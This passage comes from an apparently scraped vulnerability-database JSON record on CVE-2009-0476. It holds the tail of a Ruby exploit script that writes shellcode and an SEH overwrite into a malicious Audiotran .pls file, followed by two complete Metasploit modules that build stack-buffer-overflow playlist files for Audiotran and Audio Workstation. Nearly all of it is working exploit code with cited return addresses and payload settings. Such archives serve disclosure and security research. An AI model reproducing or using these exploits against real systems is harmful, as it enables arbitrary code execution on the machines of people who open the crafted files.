Hunters ]--|\\n\\n\"\r\n\r\n# Corelan Team MsgBox\r\npayload =\r\n\"\\xeb\\x22\\x56\\x31\\xc0\\x64\\x8b\\x40\\x30\\x85\\xc0\\x78\" +\r\n\"\\x0c\\x8b\\x40\\x0c\\x8b\\x70\\x1c\\xad\\x8b\\x40\\x08\\xeb\" +\r\n\"\\x09\\x8b\\x40\\x34\\x8d\\x40\\x7c\\x8b\\x40\\x3c\\x5e\\xc3\" +\r\n\"\\xeb\\x69\\x60\\x8b\\x6c\\x24\\x24\\x8b\\x45\\x3c\\x8b\\x54\" +\r\n\"\\x05\\x78\\x01\\xea\\x8b\\x4a\\x18\\x8b\\x5a\\x20\\x01\\xeb\" +\r\n\"\\xe3\\x34\\x49\\x8b\\x34\\x8b\\x01\\xee\\x31\\xff\\x31\\xc0\" +\r\n\"\\xfc\\xac\\x84\\xc0\\x74\\x07\\xc1\\xcf\\x0d\\x01\\xc7\\xeb\" +\r\n\"\\xf4\\x3b\\x7c\\x24\\x28\\x75\\xe1\\x8b\\x5a\\x24\\x01\\xeb\" +\r\n\"\\x66\\x8b\\x0c\\x4b\\x8b\\x5a\\x1c\\x01\\xeb\\x8b\\x04\\x8b\" +\r\n\"\\x01\\xe8\\x89\\x44\\x24\\x1c\\x61\\xc3\\xad\\x50\\x52\\xe8\" +\r\n\"\\xaa\\xff\\xff\\xff\\x89\\x07\\x44\\x44\\x44\\x44\\x44\\x44\" +\r\n\"\\x44\\x44\\x47\\x47\\x47\\x47\\x39\\xce\\x75\\xe6\\xc3\\x4c\" +\r\n\"\\x4c\\x4c\\x4c\\x89\\xe5\\xe8\\x68\\xff\\xff\\xff\\x89\\xc2\" +\r\n\"\\xeb\\x1c\\x5e\\x8d\\x7d\\x04\\x89\\xf1\\x80\\xc1\\x0c\\xe8\" +\r\n\"\\xc8\\xff\\xff\\xff\\xeb\\x15\\x31\\xd2\\x59\\x88\\x51\\x36\" +\r\n\"\\x51\\x52\\xff\\x54\\x24\\x0c\\xe8\\xdf\\xff\\xff\\xff\\x57\" +\r\n\"\\x7f\\x29\\x62\\xe8\\xe6\\xff\\xff\\xff\\x43\\x6f\\x72\\x65\" +\r\n\"\\x6c\\x61\\x6e\\x20\\x54\\x65\\x61\\x6d\\x20\\x53\\x68\\x65\" +\r\n\"\\x6c\\x6c\\x63\\x6f\\x64\\x65\\x20\\x2d\\x20\\x50\\x72\\x6f\" +\r\n\"\\x67\\x72\\x61\\x6d\\x20\\x65\\x78\\x70\\x6c\\x6f\\x69\\x74\" +\r\n\"\\x65\\x64\\x20\\x73\\x75\\x63\\x65\\x73\\x73\\x66\\x75\\x6c\" +\r\n\"\\x6c\\x79\\x58\"\r\n\r\nprint banner\r\nputs \"[+] Exploit for Audiotran 1.4.1.\"\r\n\r\nfilename = \"audiotran_poc.pls\"\r\nf = File.new(filename, 'w')\r\nf.write 'A' * 1308 #padding\r\nf.write \"\\xeb\\x06\\x90\\x90\"\r\nf.write \"\\xcb\\x75\\x52\\x73\" # ret at 0x735275CB [msvbvm60.dll]\r\nf.write payload\r\nf.write 'A' * 9000 # padding\r\nf.close\r\n\r\nputs \"[+] Wrote exploit file : #(unknown).\"", "cvss": {"score": 9.3, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/11079/"}], "metasploit": [{"lastseen": "2020-06-14T23:58:43", "description": "This module exploits a stack-based buffer overflow in Audiotran 1.4.1. An attacker must send the file to victim and the victim must open the file. Alternatively it may be possible to execute code remotely via an embedded PLS file within a browser, when the PLS extension is registered to Audiotran. This functionality has not been tested in this module.\n", "published": "2010-01-28T19:24:41", "type": "metasploit", "title": "Audiotran 1.4.1 (PLS File) Stack Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0476"], "modified": "2017-09-14T02:03:34", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/AUDIOTRAN_PLS", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Audiotran 1.4.1 (PLS File) Stack Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack-based buffer overflow in Audiotran 1.4.1.\n An attacker must send the file to victim and the victim must open the file.\n Alternatively it may be possible to execute code remotely via an embedded\n PLS file within a browser, when the PLS extension is registered to Audiotran.\n This functionality has not been tested in this module.\n },\n 'License' => MSF_LICENSE,\n 'Author' \t =>\n [\n 'Sebastien Duquette',\n 'dookie',\n ],\n 'References' =>\n [\n [ 'CVE', '2009-0476'],\n [ 'OSVDB', '55424'],\n [ 'EDB', '11079' ],\n ],\n 'Payload' =>\n {\n 'Space' => 6000,\n 'BadChars' => \"\\x00\\x0a\\x3d\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows 
Universal', { 'Ret' => 0x10101A3E } ], #p/p/r in rsaadjd.tmp\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Jan 09 2010',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [ true, 'The file name.', 'msf.pls']),\n ])\n\n end\n\n def exploit\n\n sploit = rand_text_alpha_upper(1308)\n sploit << generate_seh_payload(target.ret)\n sploit << rand_text_alpha_upper(8000)\n\n print_status(\"Creating '#{datastore['FILENAME']}' file ...\")\n\n file_create(sploit)\n\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/audiotran_pls.rb"}, {"lastseen": "2020-08-02T21:15:05", "description": "This module exploits a buffer overflow in Audio Workstation 6.4.2.4.3. When opening a malicious pls file with the Audio Workstation, a remote attacker could overflow a buffer and execute arbitrary code.\n", "published": "2009-12-10T20:46:53", "type": "metasploit", "title": "Audio Workstation 6.4.2.4.3 pls Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0476"], "modified": "2020-01-15T01:47:27", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/AUDIO_WKSTN_PLS", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Audio Workstation 6.4.2.4.3 pls Buffer Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow in Audio Workstation 6.4.2.4.3.\n When opening a malicious pls file with the Audio Workstation,\n a remote attacker could overflow a buffer and execute\n arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'germaya_x', 'dookie', ],\n 'References' =>\n [\n [ 
'CVE', '2009-0476' ],\n [ 'OSVDB', '55424' ],\n [ 'EDB', '10353' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'seh',\n 'DisablePayloadHandler' => true,\n 'AllowWin32SEH' => true\n },\n 'Payload' =>\n {\n 'Space' => 4100,\n 'BadChars' => \"\\x00\",\n 'StackAdjustment' => -3500,\n 'EncoderType' => Msf::Encoder::Type::AlphanumUpper,\n 'DisableNops' => 'True',\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows Universal', { 'Ret' => 0x1101031E } ], # p/p/r in bass.dll\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Dec 08 2009',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [ true, 'The file name.', 'msf.pls']),\n ])\n\n end\n\n def exploit\n\n sploit = rand_text_alpha_upper(1308)\n sploit << \"\\xeb\\x16\\x90\\x90\"\n sploit << [target.ret].pack('V')\n sploit << make_nops(32)\n sploit << payload.encoded\n sploit << rand_text_alpha_upper(4652 - payload.encoded.length)\n\n print_status(\"Creating '#{datastore['FILENAME']}' file ...\")\n file_create(sploit)\n\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/audio_wkstn_pls.rb"}]}